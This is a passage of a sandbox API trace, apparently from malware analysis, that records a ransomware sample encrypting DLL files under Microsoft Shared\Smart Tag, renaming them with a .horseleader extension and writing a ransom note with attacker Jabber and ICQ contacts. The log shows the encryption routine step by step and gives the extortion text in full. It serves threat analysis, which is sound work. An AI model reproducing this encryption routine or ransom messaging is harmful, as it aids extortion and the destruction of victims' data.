lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.horseleader")) returned 1 [0245.504] GetProcessHeap () returned 0x780000 [0245.504] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.504] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc65b900, ftCreationTime.dwHighDateTime=0x1caac22, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xdc65b900, ftLastWriteTime.dwHighDateTime=0x1caac22, nFileSizeHigh=0x0, nFileSizeLow=0x3580, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="STINTL.DLL.IDX_DLL", cAlternateFileName="STINTL~1.IDX")) returned 1 [0245.504] lstrcmpiW (lpString1="STINTL.DLL.IDX_DLL", lpString2="Windows") returned -1 [0245.504] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned 84 [0245.504] StrStrIW (lpFirst="STINTL.DLL.IDX_DLL", lpSrch=".horseleader") returned 0x0 [0245.504] lstrcmpW (lpString1="STINTL.DLL.IDX_DLL", lpString2="#Decrypt#.txt") returned 1 [0245.504] lstrcmpW (lpString1="STINTL.DLL.IDX_DLL", lpString2="_uninstalling_.png") returned 1 [0245.504] lstrlenW (lpString=".testttjffg") returned 11 [0245.504] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL", lpSrch=".testttjffg") returned 0x0 [0245.504] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0245.504] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x80) returned 1 [0245.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0245.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL") returned 84 [0245.505] StrStrW (lpFirst="STINTL.DLL.IDX_DLL", lpSrch=".txt") returned 0x0 [0245.505] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=13696) returned 1 [0245.505] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3580, lpOverlapped=0x0) returned 1 [0245.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffca80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3580, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3580, lpOverlapped=0x0) returned 1 [0245.508] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0245.508] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, 
lpOverlapped=0x0) returned 1 [0245.509] CloseHandle (hObject=0x1a4) returned 1 [0245.509] GetProcessHeap () returned 0x780000 [0245.509] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0245.509] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.horseleader") returned 96 [0245.509] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\STINTL.DLL.IDX_DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\stintl.dll.idx_dll.horseleader")) returned 1 [0245.510] GetProcessHeap () returned 0x780000 [0245.510] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0245.510] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc65b900, ftCreationTime.dwHighDateTime=0x1caac22, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xdc65b900, ftLastWriteTime.dwHighDateTime=0x1caac22, nFileSizeHigh=0x0, nFileSizeLow=0x3580, dwReserved0=0x3d46b48d, dwReserved1=0x38a709c6, cFileName="STINTL.DLL.IDX_DLL", cAlternateFileName="STINTL~1.IDX")) returned 0 [0245.510] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0245.510] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\#Decrypt#.txt") returned 79 [0245.510] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart 
Tag\\1033\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.510] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0245.510] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0245.511] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.512] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0245.512] CloseHandle (hObject=0x158) returned 1 [0245.512] 
GetProcessHeap () returned 0x780000 [0245.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x1e380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FBIBLIO.DLL", cAlternateFileName="")) returned 1 [0245.512] lstrcmpiW (lpString1="FBIBLIO.DLL", lpString2="Windows") returned -1 [0245.512] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned 72 [0245.512] StrStrIW (lpFirst="FBIBLIO.DLL", lpSrch=".horseleader") returned 0x0 [0245.512] lstrcmpW (lpString1="FBIBLIO.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.512] lstrcmpW (lpString1="FBIBLIO.DLL", lpString2="_uninstalling_.png") returned 1 [0245.512] lstrlenW (lpString=".testttjffg") returned 11 [0245.512] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL", lpSrch=".testttjffg") returned 0x0 [0245.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.512] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.514] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL") returned 72 [0245.514] StrStrW (lpFirst="FBIBLIO.DLL", lpSrch=".txt") returned 0x0 [0245.514] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=123776) returned 1 [0245.514] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.514] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.520] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.520] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc9c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.520] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.521] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.521] SetFilePointerEx 
(in: hFile=0x158, liDistanceToMove=0x19380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.521] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.522] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.522] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.522] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.522] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.522] CloseHandle (hObject=0x158) returned 1 [0245.523] GetProcessHeap () returned 0x780000 [0245.523] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.523] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.horseleader") returned 84 [0245.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll.horseleader")) returned 1 [0245.524] GetProcessHeap () returned 0x780000 [0245.524] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.524] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x17f80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FDATE.DLL", cAlternateFileName="")) returned 1 [0245.524] lstrcmpiW (lpString1="FDATE.DLL", lpString2="Windows") returned -1 [0245.524] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned 70 [0245.524] StrStrIW (lpFirst="FDATE.DLL", lpSrch=".horseleader") returned 0x0 [0245.524] lstrcmpW (lpString1="FDATE.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.524] lstrcmpW (lpString1="FDATE.DLL", lpString2="_uninstalling_.png") returned 1 [0245.524] lstrlenW (lpString=".testttjffg") returned 11 [0245.524] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL", lpSrch=".testttjffg") returned 0x0 [0245.524] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.524] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.524] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.525] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned 70 [0245.525] StrStrW (lpFirst="FDATE.DLL", lpSrch=".txt") returned 0x0 [0245.525] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=98176) returned 1 [0245.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.525] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.527] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.528] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.529] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x97c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.529] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.529] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.529] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.529] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x12f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.529] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.530] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.531] CloseHandle (hObject=0x158) returned 1 [0245.531] GetProcessHeap () returned 0x780000 [0245.531] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.531] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.horseleader") returned 82 [0245.531] 
MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll.horseleader")) returned 1 [0245.532] GetProcessHeap () returned 0x780000 [0245.532] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.532] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x618eeb70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x35380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FPERSON.DLL", cAlternateFileName="")) returned 1 [0245.532] lstrcmpiW (lpString1="FPERSON.DLL", lpString2="Windows") returned -1 [0245.532] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned 72 [0245.532] StrStrIW (lpFirst="FPERSON.DLL", lpSrch=".horseleader") returned 0x0 [0245.532] lstrcmpW (lpString1="FPERSON.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.532] lstrcmpW (lpString1="FPERSON.DLL", lpString2="_uninstalling_.png") returned 1 [0245.532] lstrlenW (lpString=".testttjffg") returned 11 [0245.532] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL", lpSrch=".testttjffg") returned 0x0 [0245.532] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.532] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.532] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.540] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned 72 [0245.540] StrStrW (lpFirst="FPERSON.DLL", lpSrch=".txt") returned 0x0 [0245.540] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: 